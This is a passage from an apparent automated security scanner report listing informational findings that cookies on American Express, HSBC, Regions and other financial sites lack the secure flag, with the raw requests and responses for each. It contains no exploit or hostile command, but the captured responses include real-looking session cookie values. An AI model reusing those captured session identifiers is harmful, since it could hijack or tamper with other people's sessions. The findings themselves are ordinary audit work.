Cache-Control: max-age=-11431212
Expires: Fri, 24 Sep 2010 06:27:43 GMT
Connection: close
Content-Type: text/html
Content-Length: 33640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

10.78. https://www.americanexpress.com/no-annual-fee-credit-cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /no-annual-fee-credit-cards/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /no-annual-fee-credit-cards/ HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:53 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740873890003; path=/; expires=Sun, 07-Feb-16 13:47:53 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-11431200
Expires: Fri, 24 Sep 2010 06:27:53 GMT
Connection: close
Content-Type: text/html
Content-Length: 33670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

10.79. https://www.banking.us.hsbc.com/HICServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.banking.us.hsbc.com
Path:   /HICServlet

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HICServlet HTTP/1.1
Host: www.banking.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 16:35:29 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296750929.438276; path=/; expires=Sun, 31-Jan-2021 16:35:29 GMT
Surrogate-control: no-store
Content-language: en-US
Set-cookie: HSBCUSID=00013uF8pzmV9vu4OA6F5HlhYcO:15fcas229; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


           <script language="javascript">
               window.location="/personal/personal_home_page.html"
        </script>



10.80. https://www.mystreetscape.com/my/citizensinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/citizensinvest

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my/citizensinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Thu, 03 Feb 2011 15:39:39 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=WypGP_b5c8mV_jNQmSsiR3IOaXISAk1KzDsKAUw2IAAL6AABqjMGBAAAAQAGBU1KzDsAP03; path=/; domain=.mystreetscape.com; expires=Fri, 03-Feb-2012 15:39:39 GMT
Set-cookie: spc=121; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=4F87F0A2406FC4D216FAB75C56426E60; path=/; secure
Content-length: 259
Content-type: text/html
Fsreqid: REQ4d4acc3b0a014c3620000be80000aa33
Fscalleeid: ibweb121
Fselapsedtime: 10048
Connection: close


<html>

<head>


<title>
Citizens Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/citizensinvest/jsp/login
...[SNIP]...

10.81. https://www.openforum.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?cid=inav_home&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2769004736.20480.0000; path=/
Content-Length: 102267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

10.82. https://www.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.83. https://www.regions.com/App_Themes/Default/img/arrowGray_Small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/img/arrowGray_Small.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/img/arrowGray_Small.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 68
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:40:58 GMT
Accept-Ranges: bytes
ETag: "059d6ff781c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

GIF89a.......VWQTTRVVXVVTUUUTTT......!.......,..........    Xf@V...V..;

10.84. https://www.regions.com/App_Themes/Default/img/arrowOrange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/img/arrowOrange.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/img/arrowOrange.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 60
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:00 GMT
Accept-Ranges: bytes
ETag: "08671791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

GIF89a..    .....f..........!.......,......    ........-..49v.).;

10.85. https://www.regions.com/App_Themes/Default/img/bgDot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/img/bgDot.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/img/bgDot.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 46
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:00 GMT
Accept-Ranges: bytes
ETag: "08671791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

GIF89a.............!.......,.................;

10.86. https://www.regions.com/App_Themes/Default/img/logoEqualHousingLender.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/img/logoEqualHousingLender.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/img/logoEqualHousingLender.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 252
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:00 GMT
Accept-Ranges: bytes
ETag: "08671791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

GIF89a......UUU.....................zzz......}}}...iii...uuu...^^^...aaa...mmm.........MMM...[[[\\\...LLL...!.......,.........y.'..5..X.^......q.Y....-...s`|f.C.A.T...E4.^N......>..kb.4..
....!    AV#j
...[SNIP]...

10.87. https://www.regions.com/App_Themes/Default/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/Default/screen.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/screen.css HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; www.regions.com-ssl=R1752032910; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Type: text/css
Last-Modified: Wed, 07 Apr 2010 18:14:26 GMT
Accept-Ranges: bytes
ETag: "06d12287ed6ca1:7c0f"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:15 GMT
Content-Length: 16717

/* CSS Document */

body {background: #ffffff; font-family: Arial; color: #444444; font-size: .75em; margin: 0px 0px 0px 0px; padding: 0px; text-align: center; min-width: 895px;    }

table {font-siz
...[SNIP]...

10.88. https://www.regions.com/Contact.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Contact.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Contact.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/contact.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/contact.rf">here</a>.</h2>
</body></html>

10.89. https://www.regions.com/FAQ/insured_deposits.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /FAQ/insured_deposits.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ/insured_deposits.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/faq/insured_deposits.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 163

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/faq/insured_deposits.rf">here</a>.</h2>
</body></html>

10.90. https://www.regions.com/GoogleSearch.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /GoogleSearch.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GoogleSearch.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.91. https://www.regions.com/Locator.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Locator.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Locator.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.92. https://www.regions.com/Rates.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Rates.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Rates.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.93. https://www.regions.com/about_regions.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /about_regions.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.94. https://www.regions.com/about_regions/economic_update.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /about_regions/economic_update.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_regions/economic_update.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/about_regions/economic_update.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/about_regions/economic_update.rf">here</a>.</h2>
</body></html>

10.95. https://www.regions.com/commercial_banking.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /commercial_banking.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /commercial_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.96. https://www.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Fri, 28 Sep 2007 02:41:18 GMT
Accept-Ranges: bytes
ETag: "01bc2b791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:21 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

10.97. https://www.regions.com/img/btnDownArrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /img/btnDownArrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/btnDownArrow.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 190
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:24 GMT
Accept-Ranges: bytes
ETag: "0a255f791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:20 GMT

GIF89a    ......T..8Z.T..7W.5Y....Y........X.....6W.V..V...........U.....U..9V.U.....W..T..7W.8X.V..U.....T.....!.......,....    .....;`.Xb'u..y..`.eq..$\.p....O....>..A..4.
....T...f..H4...0.dB.;

10.98. https://www.regions.com/img/btnRightArrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /img/btnRightArrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/btnRightArrow.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 388
Content-Type: image/gif
Last-Modified: Fri, 28 Sep 2007 02:41:24 GMT
Accept-Ranges: bytes
ETag: "0a255f791c81:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

GIF89a.......U..7W.......U........V..T..T..V..V.....9V.8X.9W.W..U..T.....X..6V.......U..S..S..:W.7Y.6X.W..8Y.9V....S.....:V....6W.......V..7W.U..T..U.....T.............................................
...[SNIP]...

10.99. https://www.regions.com/img/left.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /img/left.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/left.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
